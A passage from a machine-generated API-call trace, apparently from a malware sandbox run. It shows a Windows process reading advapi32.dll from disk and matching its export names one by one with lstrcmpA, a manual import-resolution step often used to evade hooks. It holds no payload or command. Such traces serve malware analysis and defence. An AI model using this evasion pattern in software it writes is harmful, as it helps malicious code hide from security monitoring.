lpString2="AppCacheFreeIESpace") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0238.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0238.830] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0238.830] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0238.831] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0238.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0238.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0238.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0238.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0238.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0238.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0238.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0238.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0238.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0238.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0238.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0238.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0238.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0238.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0238.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0238.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0238.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0238.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0238.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0238.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0238.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0238.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0238.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0238.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0238.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0238.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0238.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0238.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0238.834] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0238.834] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0238.834] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0238.847] GetProcessHeap () returned 0x430000 [0238.847] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4057040 | out: hHeap=0x430000) returned 1 [0239.040] GetProcessHeap () returned 0x430000 [0239.040] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449880 [0239.041] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0239.042] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0239.042] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0239.042] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0239.042] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0239.042] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0239.042] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0239.043] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0239.043] GetProcessHeap () returned 0x430000 [0239.043] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xa3ef0) returned 0x2c92010 [0239.044] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0239.044] ReadFile (in: hFile=0x140, lpBuffer=0x2c92010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c92010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0239.055] CloseHandle (hObject=0x140) returned 1 [0239.055] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0239.055] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0239.055] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0239.055] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0239.055] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0239.056] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0239.056] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0239.056] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0239.056] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0239.056] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0239.056] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0239.056] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0239.056] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0239.057] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0239.057] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0239.057] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0239.057] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0239.058] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0239.059] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0239.060] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0239.060] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0239.060] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0239.060] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0239.060] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0239.060] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0239.060] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0239.060] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0239.060] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0239.060] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0239.060] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0239.060] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0239.061] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0239.061] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0239.061] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0239.061] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0239.061] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0239.061] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0239.061] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0239.061] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0239.061] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0239.061] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0239.061] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0239.061] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0239.061] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0239.061] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0239.062] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0239.062] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0239.062] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0239.062] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0239.062] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0239.062] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0239.062] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0239.062] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0239.062] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0239.062] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0239.062] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0239.062] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0239.062] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0239.062] lstrcmpA 